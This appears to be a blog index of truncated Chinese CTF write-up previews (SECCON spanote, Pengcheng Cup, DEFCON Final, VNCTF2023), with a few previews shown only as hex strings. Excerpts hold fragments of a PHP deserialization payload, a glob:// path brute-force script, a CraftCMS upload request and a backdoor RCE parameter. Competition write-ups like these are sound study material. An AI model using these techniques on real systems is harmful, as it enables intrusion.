TEL

看了一天，遇到好多问题，现在都把问题理清楚了 于是有了一份自己的 exp 如下 [SECCON 2022]spanote利用浏览器缓存 此处存在 xss，虽然是 GET，但是会检查自定义的 header，直接使用浏览器访问是 x 不到的 12345678fastify.get("/api/notes/:noteId", async (request, reply) => { const user = new User(request.session.userId); if (request.headers["x-token"] !== hash(user.id)) { throw new Error("Invalid token"); } const noteId = validate(request.params.noteId); return user.sendNote(reply, noteId);}); 但是搭配剛剛講到的 cache 行為，你可以： 用 ...

去年的鹏城杯，鄙人只做出来 1 题今年的鹏城杯，鄙人和队友一起做出来了 5/6 题 web1好简单的反序列化 12345$hacker = new Hacker();$h = new H();$h->username = $hacker;echo urlencode(serialize($h)); web2glob 协议爆破文件路径 123456789101112131415import stringimport requestsburp0_url = "http://172.10.0.5:80/"dic = string.digits + string.ascii_lowercaseres = ""for length in range(40): for i in dic: burp0_data = {"filename": "glob://./backdoor_" + res + i + "*"} r = req ...

ak 的队伍不少，意味着 Web 方向的题目中规中矩 craftcms感觉是网站根目录没有写权限导致的，换一个目录写，然后文件包含 1234567891011121314151617181920212223242526272829303132POST http://61.147.171.105:50610/ HTTP/1.1Host: 61.147.171.105:49757User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.88 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Length: 767Content-Type: multipart/form-data; boundary=40226d1ab58079c727ec470ae0983832--40226d1ab58079c727ec470ae098 ...

DEFCON 初赛那会还没进 r3，这不刚来 r3 一个多月，赶上了 DEFCON FINAL，跑去北京帮忙打 web 题 这比赛线下在美国拉斯维加斯的一个酒店里，咱们去不了美利坚，但是北京租个大别墅，大家聚在一起远程玩 感觉这比赛的主办方 N******* I******** 很不行，VPN 限流，AWD 体验还不如中国的大学生国赛 mybroke源码里塞了 n 个二进制可执行文件，二进制手逆了逆，说里面有几个二进制有洞，但是需要从 web 端进行交互，不太好直接当成 pwn 来打 run.sh 12345678910111213#!/bin/bashcd /service./fileup &./fileman &./kvstore &./inventory &./integrity.dist/integrity.bin &. .venv/bin/activategunicorn --bind unix:/service/run.sock web.wsgi:app --daemon# gunicorn --bind 0.0.0.0:8080 ...

dc798e8195ee3863019cbd6c2f5993380ebcbb2497f86b7a6b587e524abbded6fe3b59b2edb2d5ae2ce187c88566d45c1cec43e81ff5e084cb1daeefad589c2027531a355bbff3528d4d4b4a791a301ac3a006dabfff1e97624611a6ee9163298e89e53bc9bb55ca99f1e35b40bef85b8239971852c23707047e6853c553bac679f7695fc2b397ec9756d72dfc453b339f7bdbc9e6106adacb89687cac43bf2e3565845f1073669aa548c6c77aeb825c5b15cf62f90c9df1e8c287cf9e8d2ecda785f327709baed9c52894c810f0f66d3edeb7610eb88442b39df3675e40880c3a1b60270b11b7ca3e007e973e72bdfd3b18795dcdf03c2b1 ...

在桂林面基广 door 师傅们，开心开心开心 我 tm 直接聊聊聊聊聊聊聊聊聊聊聊聊聊聊聊，吃吃吃吃吃吃吃吃吃吃吃吃吃吃吃，逛逛逛逛逛逛逛逛逛逛逛逛逛逛逛，玩玩玩玩玩玩玩玩玩玩玩玩玩玩玩 学长 GZTime 是男神，不用多说了吧 S1uM4i 大骇客们长得又好看，说话又好听，是温暖的大家庭捏！ 师傅们可以私聊我加友链捏，复习去了，溜 经历 break 中途：排名这么靠前，努努力进决赛 😀 break 解完三道 Web：转过身看一眼大屏，我去，怎么第一了 😰，不会结束的时候能拿冠军吧 🤪 break 结束，fix 开始：苟住苟住，我修修修修修 🥵 fix 第一轮结束看结果，Web 5 修 4 Pwn 5 修 1：我擦，运气这么好的 😳？不会等会真的得上去讲题吧 😱？ fix 第二轮结束：进决赛稳了，不过等会真的要讲题了吗 🤡？ fix 最终轮结束：Web 终于全修好，Pwn 5 修 2 真的可以讲题了呀 🤩 city_popbreak网页源码如下 1234567891011121314151617181920212223242526272829303132333 ...

和师傅们组了队一起去玩，真爽 WEB 解题就是 5/6，还是太菜 CTF 真好玩，交 flag 的时候可激动了，爷们要战斗！ ezcheck1n二血.jpg https://github.com/dhmosfunk/CVE-2023-25690-POC 如果访问 http://115.239.215.75:8082/2023/ 则返回的数据头中存在 Server: Apache/2.4.54 (Debian)如果访问 http://115.239.215.75:8082/ 那么返回的数据头是 Apache/2.4.55 (Unix) 这就是题目描述里面提到的两个容器 猜测应该是 flag 在 Debian 这里面，查看 /2023/ 的时候看到这一段代码 123456789101112<?php$FLAG = "flag{fake_flag}";@file_get_contents("http://".$_GET['url'].$FLAG);# but it' ...

dc798e8195ee3863019cbd6c2f5993380ebcbb2497f86b7a6b587e524abbded6fe3b59b2edb2d5ae2ce187c88566d45c1cec43e81ff5e084cb1daeefad589c2027531a355bbff3528d4d4b4a791a301ac3a006dabfff1e97624611a6ee9163298e89e53bc9bb55ca99f1e35b40bef85b8239971852c23707047e6853c553bac679f7695fc2b397ec9756d72dfc453b339f7bdbc9e6106adacb89687cac43bf2e3565845f1073669aa548c6c77aeb825c5b15cf62f90c9df1e8c287cf9e8d2ecda785f327709baed9c52894c810f0f66dcda597f9a545c16ccdd58d7b7e80aa6258395c8a293b42b948830f4d2f568d350013a6805138d548e ...

dc1e4cc6ba3196089d8b59c579483b7c30c56ce5b44101ad2671601110df3c26ab6ed7e0ca579f80bc7099b61a74ee774191f13443c520243791efb1e7b280c84d1485b0cdb67012b7066b5f589b290d9908c9b712c3649593d36a9f3759d5b3340646bfd4c0be8f0913f9ef6fd1f2903b3c4dcfad565dcb5e739a108cebdac5a4368808af7cedc3068ab0a01e28a034444e19cc8d12b5399ed8f046c8f1a776672ced5e17facc182581d0ebb8a5a2e0f4ff99df818afa7b24a59d776139a36ad4bcdff4a563999cac4e80d6436a8480d0d611bd190c3beb11b6625e48bbe1bc5ea5ba3698deb88166be69b9a2602bb00b00cd8cd29a77240 ...

VNCTF2023 web 总共有四题，其中 easyzentao 这题是一个 0day 题，比赛最后 0 解 比赛的时候，三题 web 做的比较快吧，最后到了 web 分榜第 4 象棋王子view-source:http://c10b96ab-03e8-4850-b887-291568faf6ed.node4.buuoj.cn:81/js/play.js 12345678play.showWin = function (my){ play.isPlay = false; if (my===1){ ............................ }else{ alert("······"); }} 复制 js 代码到 console 运行，可以得到 flag BabyGobackdoor pkg 可以實現 RCE 参考 需要将所有空格替换成 \t，然后传入 /backdoor?pkg=······ 1234567891011os/exec""fm ...